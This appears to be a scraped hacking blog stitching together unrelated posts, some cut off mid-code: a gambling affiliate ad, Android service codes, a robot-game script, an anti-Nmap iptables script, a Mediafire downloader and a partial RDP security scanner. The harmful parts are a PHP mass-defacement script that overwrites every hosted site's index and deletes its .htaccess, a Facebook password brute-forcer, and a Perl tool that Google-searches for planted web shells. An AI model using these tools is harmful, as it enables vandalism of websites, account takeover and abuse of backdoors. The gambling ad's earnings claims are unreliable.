Simple how to earn money from affiliate

How to earn $0.05 for every day just share a link affiliate
this is the way,

just click on the link Cent Play

INTRODUCTION

Promotion Program which designed to help you play games when balance go zero, you can get $0.01 every minute to continue to play.

PROMOTION RULES

• Get $0.01 every minute, up to $0.05 every day.
• You account will be make lower priority if you make an withdraw request.
• You must stay on promotion page for 1 minute and wait until money come to your balance


THIS IS THE RULES

1. DEPOSIT WITHOUT CREATING ACCOUNT

No need to creating account, never mind about account securities problem, no need to login, no need to remember your account information.

2. PLAYING GAMES WITHOUT DOWNLOADING
   Instantly play our games without downloading anything, no need flash player, you can even play games in your mobile. Easy to play, easy to win.

3. WITHDRAW WITHOUT REQUESTING
   You can request withdraw anytime you want or without requesting. Our system send payment to your account automatically after 90 minutes of inactivity.


Join know => http://www.centplay.com/affiliate/promotion_6570/

Update Payment Proof

PO 1 In this morning

PO 2 same Day

Baca Selengkapnya... Simple how to earn money from affiliate

Android Secret Codes

Android is going to be very popular now these days.Android market provides wide range of applications for fulfill all your needs.As a Android user all you need to know about Android OS. So here i m sharing with you some secret code. This code helps you to access some hidden option which are generally not given as default.Plz use this code carefully because if you are unaware of these advanced settings then it may be harmful for your phone.

 *#*#7780#*#*   - This code is used for factory restore setting.This will remove google account setting and System and application data and settings.

*2767*3855#   -  This code is used for factory format, and will remove all files and settings including the internal memory storage. It will also reinstall the firmware.

*#*#4636#*#*   - This code show information about your phone and battery.

*#*#273283*255*663282*#*#*    - This code opens a File copy screen where you can backup your media files e.g. Images, Sound, Video and Voice memo.

*#*#197328640#*#*    -  This code can be used to enter into Service mode. You can run various tests and change settings in the service mode.

*#*#7594#*#*   -  This code enable your "End call / Power" button into direct poweroff button without asking for selecting any option(silent mode, aeroplane and poweroff).

*#*#8255#*#*  -  This code can be used to launch GTalk Service Monitor.

*#*#34971539#*#*    -  This code is used to get camera information.Plz avoid update camera firmware option.

WLAN, GPS and Bluetooth Test Codes:

*#*#232339#*#* OR *#*#526#*#* OR *#*#528#*#*   -  WLAN test (Use “Menu” button to start various tests).

*#*#232338#*#*    -  Shows WiFi MAC address.

*#*#1472365#*#*    -  GPS test.

*#*#1575#*#*    -  Another GPS test.

*#*#232331#*#*   -  Bluetooth test.

*#*#232337#*#    -  Shows Bluetooth device address.

Codes to launch various Factory Tests:

*#*#0842#*#*   - Device test (Vibration test and BackLight test)

*#*#0588#*#*    - Proximity sensor test

*#*#0*#*#*    -  LCD test

*#*#2664#*#*   -  Touch screen test

*#*#2663#*#*    -  Touch screen version

*#*#0283#*#*   -  Packet Loopback

*#*#0673#*#* OR *#*#0289#*#*    -  Melody test

*#*#3264#*#*    -  RAM version

Code for firmware version information.

*#*#1111#*#*   -  FTA SW Version

*#*#2222#*#*   - FTA HW Version

*#*#44336#*#* - PDA, Phone, CSC, Build Time, Changelist number

*#*#4986*2650468#*#*   - PDA, Phone, H/W, RFCallDate

*#*#1234#*#*  - PDA and Phone

Baca Selengkapnya... Android Secret Codes

Underc0der

!init
        #config scanner= 3
        #config weapon=  3
        #config armor=   4
        #config engine=  0
        #config heatsinks= 2
        #def    wpc
        #def    ang
        #def    turn            ;how much to turn
        #def    rh              ;relative heading
        #def    ts              ;target speed
        #def    o               ;pos/neg offset flag
        #def    off             ;firing offset
        out     11,     100     ;full throttle.
        out     22,     8       ;lay mine, trigger 8.
        out     17,     64      ;128 degree scan arc.
        mov     DX,     64
        mov     AX,     1
        mov     turn,   7
        int     3               ;keepshift on.
        out     22,     8       ;lay mine, trigger 8.
        jmp     !steer
!path
        cmp     @9,     250     ;Have we travelled 250 metres?
        jgr     !steer          ;if yes, steer.
        out     14,     turn    ;turn
        int     12              ;collisions?
        cmp     FX,     0
        jgr     !crash          ;if yes, respond to crash.
        jmp     !scan
 !crash
        int     13              ;reset collision count.
 !steer
        int     19              ;clear meters count.
        jmp     !checkpos       ;steer.
!scan
        out     11,     100
        in      7,      BX      ;scan
        cmp     BX,     1500    ;anyone in sight?
        jge     !nonefound      ;adjust scan arc to suit.
        jls     !arcmodf        ;modify arc & fire.
!nonefound
        cmp     DX,     64      ;Are we at maximum scan width already?
        je      !flip           ;if yes, flip turret.
        shl     DX,     1       ;else, double DX and
        out     17,     DX      ;set new scans to DX width.
        jmp     !path           ;path
 !flip
        out     12,     125     ;turn turret 125 degrees.
        jmp     !path           ;path
!arcmodf
        cmp     DX,     2       ;is scan angle 2 degrees?
        jle     !fire           ;if yes, fire. Else:
        shr     DX,     1       ;halve DX
        out     17,     DX      ;set scans to DX.
        cmp     @3,     0       ;is enemy in centre?
        jgr     !accright       ;if right, respond
        jls     !accleft        ;if left, respond.
        shr     DX,     1       
        out     17,     DX      ;quarter scan arc
        jmp     !fast           ;check if target is fast
 !accright
        out     12,     DX      ;turn radar right by scanarc.
        cmp     @3,     2       ;is it out by +2?
        jls     !fast           ;if less, fast
        out     12,     DX      ;turn radar right by 200% scanarc.
        jmp     !fast           ;check if target is fast
 !accleft
        mov     BX,     DX      ;set BX=scanarc
        neg     BX              ;and negate BX
        out     12,     BX      ;turn radar left by scanarc.
        cmp     @3,     -2      ;is it out by -2?
        jgr     !fast           ;if more, fast.
        out     12,     BX      ;turn radar left by 200% scanarc.
        jmp     !fast           ;check if target is fast
!fast
        cmp     @13,    768     ;is enemy moving very fast?
        jgr     !fire           ;if yes, fire
        jmp     !scan           ;else, scan.

!fire
        out     12,     @3      ;correct turret.
        in      2,      BX      ;check heat.
        cmp     BX,     200     ;too hot?
        jgr     !lock           ;if yes, lock. Else:
        cmp     @7,     0       ;Is target stationary?
        je      !statfire       ;if yes, fire at stationary target. Else:
        mov     ts,     @13     ;target speed
        mov     rh,     @6      ;relative heading
        cmp     ts,     0
        jge     !ps
        neg     ts
        add     rh,     128
        and     rh,     255
 !ps
        shr     ts,     6
        shl     ts,     7
        shr     rh,     1
        mov     off,    1028
        add     off,    ts
        add     off,    rh
        err     off
        jmp     !fireadj
 !statfire
        mov     AX,     1       ;
        int     4               ;Overburn= on.
        out     15,     0       ;fire
        out     15,     0       ;fire
        out     15,     0       ;fire
        out     15,     0       ;fire
        mov     AX,     0       ;
        int     4               ;Overburn = off.
        jmp     !lock           ;lock.
!lock
        out     14,     turn    ;turn
        in      7,      BX      ;scan
        out     12,     @3      ;adjust turret
        jmp     !scan           ;and scan.
!checkpos
        mov     wpc,    0
        int     2               ;get x and y co-ordinates.
        cmp     ex,     500
        jls     !wwall          ;west side
        jge     !ewall          ;east side
 !wwall
        cmp     fx,     500
        jle     !wwalln         ;northwest
        jgr     !wwalls         ;southwest
  !wwalln
        cmp     ex,     fx      ;closer to west or north wall?
        jle     !wnq            ;closer to west
        jgr     !nwq            ;closer to north
  !wwalls
        sub     fx,     1000
        neg     fx              ;distance rather than co-ord.
        cmp     ex,     fx      ;closer to west or south wall?
        jle     !wsq            ;closer to west
        jgr     !swq            ;closer to south
 !ewall
        cmp     fx,     500
        jle     !ewalln         ;northeast
        jgr     !ewalls         ;southeast
  !ewalln
        sub     ex,     1000
        neg     ex              ;distance rather than co-ord.
        cmp     ex,     fx      ;closer to east or north wall?
        jle     !enq            ;closer to east
        jgr     !neq            ;closer to north
  !ewalls
        cmp     ex,     fx      ;closer to east or south wall?
        jge     !esq            ;closer to east
        jls     !seq            ;closer to south
!wnq
        mov     ang,    112     ;desired heading
        sub     ang,    @1      ;difference
        out     14,     ang     ;turn to desired heading
        neg     turn
        jmp     !scan
!nwq
        mov     ang,    80      ;desired heading
        sub     ang,    @1      ;difference
        out     14,     ang     ;turn to desired heading
        neg     turn
        jmp     !scan
!wsq
        mov     ang,    16      ;desired heading
        sub     ang,    @1      ;difference
        out     14,     ang     ;turn to desired heading
        neg     turn
        jmp     !scan
!swq
        mov     ang,    48      ;desired heading
        sub     ang,    @1      ;difference
        out     14,     ang     ;turn to desired heading
        neg     turn
        jmp     !scan
!enq
        mov     ang,    144     ;desired heading
        sub     ang,    @1      ;difference
        out     14,     ang     ;turn to desired heading
        neg     turn
        jmp     !scan
!neq
        mov     ang,    176     ;desired heading
        sub     ang,    @1      ;difference
        out     14,     ang     ;turn to desired heading
        neg     turn
        jmp     !scan
!esq
        mov     ang,    240     ;desired heading
        sub     ang,    @1      ;difference
        out     14,     ang     ;turn to desired heading
        neg     turn
        jmp     !scan
!seq
        mov     ang,    208     ;desired heading
        sub     ang,    @1      ;difference
        out     14,     ang     ;turn to desired heading
        neg     turn
        jmp     !scan
!fireadj                        ;adjusted firing routine.
        out     12,     [off]
        out     15,     0       ;fire w/ new angle.
        out     15,     0       ;fire w/ new angle.
        cmp     @13,    500     ;enemy speed?
        jgr     !lock           ;
        out     15,     0       ;fire w/ new angle.
        out     15,     0
        jmp     !lock

Baca Selengkapnya... Underc0der

[JAVA] SQL Tools Auto Injector

Full source C0de => View

Baca Selengkapnya... [JAVA] SQL Tools Auto Injector

Priv8 2012 Bypass Shell

Full Source c0de => View

Baca Selengkapnya... Priv8 2012 Bypass Shell

Block NMAP Scan on Your Server

This is a simple bash shell to block NMAP Scan to your server

#!/bin/bash
# To run this file, first give the permission +x and execute this program
# --# chmod +x blocknmap.sh
# --# ./blocknmap.sh


echo "1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1"
echo "3                                                                      3"
echo "3     ________   .__          ________                                 3"
echo "7     \______ \  |__|  ______/   __   \     ____    ____    _____      7"
echo "1      |    |  \ |  | /  ___/\____    /   _/ ___\  /  _ \  /     \     1"
echo "3      |        \|  | \___ \    /    /    \  \___ (  <_> )|  Y Y  \    3"
echo "3     /_______  /|__|/____  >  /____/   /\ \___  > \____/ |__|_|  /    3"
echo "7             \/          \/            \/     \/               \/     7"
echo "1                                                                      1"
echo "3              >> The Underground Exploitation Team                    3"
echo "3                                                                      3"
echo "7                                                                      7"
echo "1          [+] Site   : http://www.Dis9.com                            1"
echo "3                                                                      3"
echo "3                                                                      3"
echo "7            ###############################################           7"
echo "1            I'm Liyan Oz Leader of Underground Exploitation           1"
echo "3            ###############################################           3"
echo "3                                                                      3"                                          
echo "7-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-7"
echo "========================================================================"
echo "=                  Block Nmap Scanning using iptables                  ="
echo "=                         C0ded by Liyan Oz                            ="
echo "=                      http://0nto.wordpress.com                       ="
echo "========================================================================"  
echo ""
echo ""
#=====================
# Enable IP Forward
#---------------------


echo 1 > /proc/sys/net/ipv4/ip_forward


#=====================
# Flush semua rules
#---------------------
/sbin/iptables -F
/sbin/iptables -t nat -F


#=====================
# Block
#---------------------


/sbin/iptables -t filter -A INPUT -p TCP -m state --state RELATED,ESTABLISHED -j ACCEPT
/sbin/iptables -t filter -A INPUT -p UDP -m state --state RELATED,ESTABLISHED -j ACCEPT
/sbin/iptables -t filter -A INPUT -p ICMP -m state --state RELATED,ESTABLISHED -j ACCEPT
/sbin/iptables -t filter -A INPUT -m state --state INVALID -j DROP


/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags ACK,FIN FIN -j LOG --log-prefix "FIN: "
/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags ACK,FIN FIN -j DROP


/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags ACK,PSH PSH -j LOG --log-prefix "PSH: "
/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags ACK,PSH PSH -j DROP


/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags ACK,URG URG -j LOG --log-prefix "URG: "
/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags ACK,URG URG -j DROP


/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags ALL ALL -j LOG --log-prefix "XMAS scan: "
/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags ALL ALL -j DROP


/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags ALL NONE -j LOG --log-prefix "NULL scan: "
/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags ALL NONE -j DROP


/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags ALL SYN,RST,ACK,FIN,URG -j LOG --log-prefix "pscan: "
/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags ALL SYN,RST,ACK,FIN,URG -j DROP


/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags SYN,FIN SYN,FIN -j LOG --log-prefix "pscan 2: "
/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags SYN,FIN SYN,FIN -j DROP


/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags FIN,RST FIN,RST -j LOG --log-prefix "pscan 2: "
/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags FIN,RST FIN,RST -j DROP


/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags ALL SYN,FIN -j LOG --log-prefix "SYNFIN-SCAN: "
/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags ALL SYN,FIN -j DROP


/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags ALL URG,PSH,FIN -j LOG --log-prefix "NMAP-XMAS-SCAN: "
/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags ALL URG,PSH,FIN -j DROP


/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags ALL FIN -j LOG --log-prefix "FIN-SCAN: "
/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags ALL FIN -j DROP


/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags ALL URG,PSH,SYN,FIN -j LOG --log-prefix "NMAP-ID: "
/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags ALL URG,PSH,SYN,FIN -j DROP
/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags SYN,RST SYN,RST -j LOG --log-prefix "SYN-RST: "

Baca Selengkapnya... Block NMAP Scan on Your Server

Mass defaces root user

       |
# Email      : oy3@hotmail.com                     |
#--------------------------------------------------/


\n");


if(!$argv[1]){

print_r("

-------------------------------------\
USAGE : php mass_sa.php [Your index] |
Ex    : php mass_sa.php index.htm    |
-------------------------------------/

");
die();

}



$d00m = @file("/etc/named.conf");

if(!$d00m)
{
die (" can't read /etc/named.conf");
}
else

{
$f =@fopen ('shack.txt','w');

foreach($d00m as $dom){

if(eregi("zone",$dom)){

preg_match_all('#zone "(.*)"#', $dom, $domsws);


if(strlen(trim($domsws[1][0])) > 2){

$user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));

$site = $user['name'] ;

$file = $argv[1];

$file2 = @file("$file");

$dom3n = $domsws[1][0];

if (empty($file2))
{
  print_r("file $file not here !

  " );
  exit;
}
else {



$copy = @copy("$file","/home/".$user['name']."/public_html/$file");

if ($copy)
{

@system("rm /home/".$user['name']."/public_html/.htaccess");

print_r("$dom3n <-- done \n \n");

@fwrite($f,"$dom3n \n" );

}else
{
 print_r("$dom3n <-- error ! \n \n");



}
}
}
}
}
}



print_r("
\n\n
#--------------------------------------------------\
#            sites hacked in a shack.txt  ^_*      |
#            al-swisre _ oy3@hotmail.com           |
#--------------------------------------------------/


\n");



?>

Baca Selengkapnya... Mass defaces root user

SQL CMD 3.0

View Full Source Code => View

Baca Selengkapnya... SQL CMD 3.0

BackDoor Finder

#!/usr/bin/perl

use strict;
use warnings;
use LWP::UserAgent;

usage() unless $ARGV[2];

my @searchTerm;
my @checkTerm;

if(lc($ARGV[0]) eq "r57") {
        push(@searchTerm, "inurl:r57.php");
        push(@searchTerm, "\"[ phpinfo ]  [ php.ini ]  [ cpu ]  [ mem ]  [ users ]  [ tmp ]  [ delete ]\"");
        push(@searchTerm, "intitle:r57shell");
        push(@checkTerm, "r57");
        push(@checkTerm, "safe_mode");
} elsif(lc($ARGV[0]) eq "c99") {
        push(@searchTerm, "inurl:c99.php");
        push(@searchTerm, "\"Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout\"");
        push(@searchTerm, "intitle:\" - phpshell\"");
        push(@searchTerm, "intitle:\" - c99shell\"");
        push(@checkTerm, "c99");
        push(@checkTerm, "Safe-mode");
} elsif(lc($ARGV[0]) eq "mys") {
        push(@searchTerm, "\"Auto error traping enabled\"");
        push(@searchTerm, "intitle:\"MyShell 1.1.0 build 20010923\"");
        push(@checkTerm, "MyShell");
        push(@checkTerm, "Echo commands");
} elsif(lc($ARGV[0]) eq "phs") {
        push(@searchTerm, "intitle:\"PHP Shell 1.5\"");
        push(@searchTerm, "intitle:\"PHP Shell 1.6\"");
        push(@searchTerm, "intitle:\"PHP Shell 1.7\"");
        push(@searchTerm, "\"Enable stderr-trapping?\"");
        push(@checkTerm, "PHP Shell");
        push(@checkTerm, "Choose new working");
} elsif(lc($ARGV[0]) eq "phm") {
        push(@searchTerm, "\"PHPShell by Macker\"");
        push(@searchTerm, "\"[ Main Menu ]      [ PHPKonsole ]      [ Haxplorer ]\"");
        push(@checkTerm, "Haxplorer");
        push(@checkTerm, "PHPKonsole");
} elsif(lc($ARGV[0]) eq "rem") {
        push(@searchTerm, "intitle:\"phpRemoteView: \"");
        push(@searchTerm, "\"REMVIEW TOOLS\"");
        push(@checkTerm, "phpRemoteView");
        push(@checkTerm, "perms");
}

if(!@searchTerm) {
        print "Error: [shell to find] is a unknown shell\n" and die;
}

my $outputOn;

if(lc($ARGV[1]) eq "on") {
        $outputOn = 1;
} elsif(lc($ARGV[1]) eq "off") {
        $outputOn = 0;
} else {
        print "Error: [screen output] must be \"on\" or \"off\"\n" and die;
}

my $outputFile;

if(index(lc($ARGV[2]), ".htm") > 0) {
        $outputFile = $ARGV[2];
} else {
        print "Error: [output HTML file] must be *.htm or *.html\n" and die;
}

open(FILEHANDLE, ">$outputFile");
print FILEHANDLE "\n";
close FILEHANDLE;

my $userAgent = LWP::UserAgent->new;
$userAgent->agent("User-Agent=Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.5) Gecko/20061201 Firefox/2.0.0.5");

my @resultLinks;

foreach(@searchTerm) {
        print "[*] Query for \"$_\"\n" if($outputOn == 1);
       
        my $isLastPage = 0;
       
        for(my $gPage = 0; ; $gPage++) {
                if($isLastPage == 1) { last; }
               
                my $gRequest =  HTTP::Request->new(GET => "http://www.google.de/search?q=$_&start=$gPage"."0");
                my $gResource = $userAgent->request($gRequest);
               
                if($gResource->is_success) {
                        my @gContent = split("
", $gResource->content);
                        if(@gContent < 10) { $isLastPage = 1; };
                       
                        for(my $gPiece = 1; $gPiece < @gContent; $gPiece++) {
                                my $shellLink = substr($gContent[$gPiece], index($gContent[$gPiece], "href=\"") + 6);
                                $shellLink = substr($shellLink, 0, index($shellLink, "\""));
                               
                                print "[*] Check status of site \"$shellLink\"\n" if($outputOn == 1);
                               
                                my $sRequest = HTTP::Request->new(GET => $shellLink);
                                my $sResource = $userAgent->request($sRequest);
                               
                                if($sResource->is_success) {
                                        if(index($sResource->content, $checkTerm[0]) != -1 && index($sResource->content, $checkTerm[1]) != -1) {
                                                open(FILEHANDLE, ">>$outputFile");
                                                print FILEHANDLE "Link: $shellLink
\n";
                                                print FILEHANDLE "Search Term: $_

\n";
                                                close FILEHANDLE;
                                               
                                                print "[+] Found shell: $shellLink\n" if($outputOn == 1);
                                        } else {
                                                print "[-] No shell\n" if($outputOn == 1);
                                        }
                                } else {
                                        print "[-] Offline\n" if($outputOn == 1);
                                }
                        }
                       
                        sleep 20; #wait 20 seconds so google dont think we are a bot
                } else {
                        print "Unable to query google\n" and die;
                }
        }
}

open(FILEHANDLE, ">>$outputFile");
print FILEHANDLE "

Find PHP Shells via Google - by DiA/RRLF";
close FILEHANDLE;

sub usage {
        print qq(
Find PHP Shells via Google - by DiA/RRLF (http://www.vx-dia.de.vu)
       
Usage:   perl $0 [shell to find] [screen output] [output HTML file]
                  [shell to find] can be:
                        r57 - find r57shell
                        c99 - find c99shell
                        mys - find MyShell
                        phs - find PHP Shell
                        phm - find PHPShell (Macker)
                        rem - find phpRemoteView
                  [screen output] can be:
                        on  - every step the script doas get printed on the screen
                        off - no output, the script just writes to the output file
                  [output HTML file] must be:
                        *.htm or *.html
                                                           
Example: perl $0 c99 on c99shells.htm
         perl $0 mys off manyshells.htm

)       and exit;
}

Baca Selengkapnya... BackDoor Finder

FaceBook BruteForce

",$source)){return true;} else {return false;} 
 
} 
 
if(!is_file($dictionary)){echo "$dictionary is not file";exit;} 
$lines=file($dictionary); 
echo "Attack Starting..
"; 
sleep(10); 
echo "Attack Started, brute forcing..
"; 
foreach($lines as $line){ 
$line=str_replace("\r","",$line); 
$line=str_replace("\n","",$line); 
if(kontrol($username,$line)){echo "[+] username:$username , password:$line - P 
assword found : $line
";$fp=fopen('cookie.txt','w');fwrite($fp,'');exit;} 
else{echo "[-] username:$username , password:$line - Password not found :  
$line
";} 
} 
?>

Baca Selengkapnya... FaceBook BruteForce

mediafire.pl [Mediafire Downloader]

#!/usr/bin/perl

# mediafire folder download script
# designed to download the contents of a folder on mediafire
# it's actually kind of slow, but that's mediafire's fault
# unsure if downloading portion has error or if that's the uploader's fault 
# but not all archives arrive intact
# provides:
#	 &list_contents(mediafire_folder_id)
#	 &mfget(mediafire_download_id)
# will prompt for captcha once every ~6 downloads unfortunately, delays 80 seconds between dls
# names files by mediafire id since url-encoded utf8 strings are retarded
# :3c

use strict;
use warnings "all";
use LWP::UserAgent;

my $ua = LWP::UserAgent->new(agent=>'loldongs/1.0',timeout=>'15',show_progress=>'1');
my $method = "wget"; #wget or lwp

&list_contents('1h0h4dsc2b0y2');

sub list_contents {
	my $folder = shift(@_);
	my $res = $ua->get("http://www.mediafire.com/api/folder/get_content.php?r=plwp&content_type=files&filter=all&order_by=name&order_direction=asc&version=2&folder_key=" . $folder . "&response_format=json");
	if ($res->is_success) {
		my $content = $res->decoded_content;
		my @links;
		while ($content=~s/"quickkey":"(.+?)","filename":"(.+?)",//) {
			my $link = $1; my $name = $2;
			if ($name=~/flac/i) { next; }
			push @links, $1;
		}
		my $total = scalar(@links);
		$total--;
		for (0..$total) {
			print "[$_ / $total] http://www.mediafire.com/?" . $links[$_] . "\n";
			&mfget($links[$_]);
		}
	}
}

sub mfget {
	my $id = shift(@_);
	my $res = $ua->get("http://www.mediafire.com/?" . $id);
	if ($res->decoded_content=~m|= "(http://.+?/[0-9a-z]{12}/$id/.+?)";|) {
		my $url = $1;
		my $ext = $url;
		$ext=~s/^.+\.//; #get only the extension
		if ($method eq "lwp") {
			$ua->get($url,":content_file" => $id . $ext);
		} elsif ($method eq "wget") {
			system("wget -U 'loldongs/1.0' $url");
		}
		{$| = 1; for (1..80) { print "#"; sleep(1); } }
	} else {
		print "OH NO IT'S A CAPTCHA!!!\n";
		system("start http://www.mediafire.com/?" . $id);
		system("pause");
		&mfget($id);
	}
}

Baca Selengkapnya... mediafire.pl [Mediafire Downloader]

RDP Scanner Protocol

# Install Dulu Encoding::BER
# Cara nya ketikan di Terminal a/ Command Prompt perl -MCPAN -e shell
# lalu masukan install Encoding::BER
# CODE :
use strict;
use warnings;
use IO::Socket::INET;
use Getopt::Long;
use Encoding::BER;

my %rdp_neg_type;
$rdp_neg_type{"01"} = "TYPE_RDP_NEG_REQ";
$rdp_neg_type{"02"} = "TYPE_RDP_NEG_RSP";
$rdp_neg_type{"03"} = "TYPE_RDP_NEG_FAILURE";

my %rdp_neg_rsp_flags;
$rdp_neg_rsp_flags{"00"} = "NO_FLAGS_SET";
$rdp_neg_rsp_flags{"01"} = "EXTENDED_CLIENT_DATA_SUPPORTED";
$rdp_neg_rsp_flags{"02"} = "DYNVC_GFX_PROTOCOL_SUPPORTED";

my %rdp_neg_protocol;
$rdp_neg_protocol{"00"} = "PROTOCOL_RDP";
$rdp_neg_protocol{"01"} = "PROTOCOL_SSL";
$rdp_neg_protocol{"02"} = "PROTOCOL_HYBRID";

my %rdp_neg_failure_code;
$rdp_neg_failure_code{"01"} = "SSL_REQUIRED_BY_SERVER";
$rdp_neg_failure_code{"02"} = "SSL_NOT_ALLOWED_BY_SERVER";
$rdp_neg_failure_code{"03"} = "SSL_CERT_NOT_ON_SERVER";
$rdp_neg_failure_code{"04"} = "INCONSISTENT_FLAGS";
$rdp_neg_failure_code{"05"} = "HYBRID_REQUIRED_BY_SERVER";
$rdp_neg_failure_code{"06"} = "SSL_WITH_USER_AUTH_REQUIRED_BY_SERVER";

my %encryption_level;
$encryption_level{"00000000"} = "ENCRYPTION_LEVEL_NONE";
$encryption_level{"00000001"} = "ENCRYPTION_LEVEL_LOW";
$encryption_level{"00000002"} = "ENCRYPTION_LEVEL_CLIENT_COMPATIBLE";
$encryption_level{"00000003"} = "ENCRYPTION_LEVEL_HIGH";
$encryption_level{"00000004"} = "ENCRYPTION_LEVEL_FIPS";

my %encryption_method;
$encryption_method{"00000000"} = "ENCRYPTION_METHOD_NONE";
$encryption_method{"00000001"} = "ENCRYPTION_METHOD_40BIT";
$encryption_method{"00000002"} = "ENCRYPTION_METHOD_128BIT";
$encryption_method{"00000008"} = "ENCRYPTION_METHOD_56BIT";
$encryption_method{"00000010"} = "ENCRYPTION_METHOD_FIPS";

my %version_meaning;
$version_meaning{"00080001"} = "RDP 4.0 servers";
$version_meaning{"00080004"} = "RDP 5.0, 5.1, 5.2, 6.0, 6.1, 7.0, 7.1, and 8.0 servers";

my $enc = Encoding::BER->new(warn => sub{});
my %config;

my $VERSION = "0.8-beta";
my $usage = "Starting rdp-sec-check v$VERSION ( http://labs.portcullis.co.uk/application/rdp-sec-check/ )
Copyright (C) 2012 Mark Lowe (mrl\@portcullis-security.com)

rdp-sec-check.pl host:port

";
my $debug    = 0;
my $verbose  = 0;
my $help = 0;

my $result = GetOptions (
         "verbose"   => \$verbose,
         "debug"     => \$debug,
         "help"      => \$help
);

if ($help) {
	print $usage;
	exit 0;
}

if ($debug) {
	use Data::Dumper;
	use warnings FATAL => 'all';
	use Carp qw(confess);
	$SIG{ __DIE__ } = sub { confess( @_ ) };
}

my $host = shift or die $usage;
my $port = 3389;
if ($host =~ /\s*(\S+):(\d+)\s*/) {
	$host = $1;
	$port = $2;
}
my $ip = resolve($host);
unless (defined($ip)) {
	die "[E] Can't resolve hostname $host\n";
}

# flush after every write
$| = 1;

my $global_starttime = time;
printf "Starting rdp-sec-check v%s ( http://labs.portcullis.co.uk/application/rdp-sec-check/ ) at %s\n", $VERSION, scalar(localtime);

scan_host($host, $ip, $port);

print "\n";
printf "rdp-sec-check v%s completed at %s\n", $VERSION, scalar(localtime);
print "\n";

sub scan_host {
	my ($host, $ip, $port) = @_;
	print "\n";
	print "Target:    $host\n";
	print "IP:        $ip\n";
	print "Port:      $port\n";
	print "\n";
	print "[+] Connecting to $ip:$port\n" if $debug > 1;
	my $socket;
	my @response;

	print "[+] Checking supported protocols\n\n";
	print "[-] Checking if RDP Security (PROTOCOL_RDP) is supported...";
	$socket = get_socket($ip, $port);
	@response = test_std_rdp_security($socket);
	if (scalar @response == 19) {
		my $type = $rdp_neg_type{sprintf "%02x", ord($response[11])};
		if ($type eq "TYPE_RDP_NEG_FAILURE") {
			printf "Not supported - %s\n", $rdp_neg_failure_code{sprintf("%02x", ord($response[15]))};
			$config{"protocols"}{"PROTOCOL_RDP"} = 0;
		} else {
			if ($rdp_neg_protocol{sprintf("%02x", ord($response[15]))} eq "PROTOCOL_RDP") {
				print "Supported\n";
				$config{"protocols"}{"PROTOCOL_RDP"} = 1;
			} else {
				printf "Not supported.  Negotiated %s\n", $rdp_neg_protocol{sprintf("%02x", ord($response[15]))};
			}
		}
	} elsif (scalar @response == 11) {
		printf "Negotiation ignored - old Windows 2000/XP/2003 system?\n";
		$config{"protocols"}{"PROTOCOL_RDP"} = 1;
	} else {
		print "Not supported - unexpected response\n";
		$config{"protocols"}{"PROTOCOL_RDP"} = 1;
	}

	print "[-] Checking if TLS Security (PROTOCOL_SSL) is supported...";
	$socket = get_socket($ip, $port);
	@response = test_tls_security($socket);
	if (scalar @response == 19) {
		my $type = $rdp_neg_type{sprintf "%02x", ord($response[11])};
		if ($type eq "TYPE_RDP_NEG_FAILURE") {
			printf "Not supported - %s\n", $rdp_neg_failure_code{sprintf("%02x", ord($response[15]))};
			$config{"protocols"}{"PROTOCOL_SSL"} = 0;
		} else {
			if ($rdp_neg_protocol{sprintf("%02x", ord($response[15]))} eq "PROTOCOL_SSL") {
				print "Supported\n";
				$config{"protocols"}{"PROTOCOL_SSL"} = 1;
			} else {
				printf "Not supported.  Negotiated %s\n", $rdp_neg_protocol{sprintf("%02x", ord($response[15]))};
			}
		}
	} elsif (scalar @response == 11) {
		printf "Negotiation ignored - old Windows 2000/XP/2003 system?\n";
		$config{"protocols"}{"PROTOCOL_SSL"} = 0;
	} else {
		print "Not supported - unexpected response\n";
		$config{"protocols"}{"PROTOCOL_SSL"} = 0;
	}

	print "[-] Checking if CredSSP Security (PROTOCOL_HYBRID) is supported [uses NLA]...";
	$socket = get_socket($ip, $port);
	@response = test_credssp_security($socket);
	if (scalar @response == 19) {
		my $type = $rdp_neg_type{sprintf "%02x", ord($response[11])};
		if ($type eq "TYPE_RDP_NEG_FAILURE") {
			printf "Not supported - %s\n", $rdp_neg_failure_code{sprintf("%02x", ord($response[15]))};
			$config{"protocols"}{"PROTOCOL_HYBRID"} = 0;
		} else {
			if ($rdp_neg_protocol{sprintf("%02x", ord($response[15]))} eq "PROTOCOL_HYBRID") {
				print "Supported\n";
				$config{"protocols"}{"PROTOCOL_HYBRID"} = 1;
			} else {
				printf "Not supported.  Negotiated %s\n", $rdp_neg_protocol{sprintf("%02x", ord($response[15]))};
			}
		}
	} elsif (scalar @response == 11) {
		printf "Negotiation ignored - old Windows 2000/XP/2003 system??\n";
		$config{"protocols"}{"PROTOCOL_HYBRID"} = 0;
	} else {
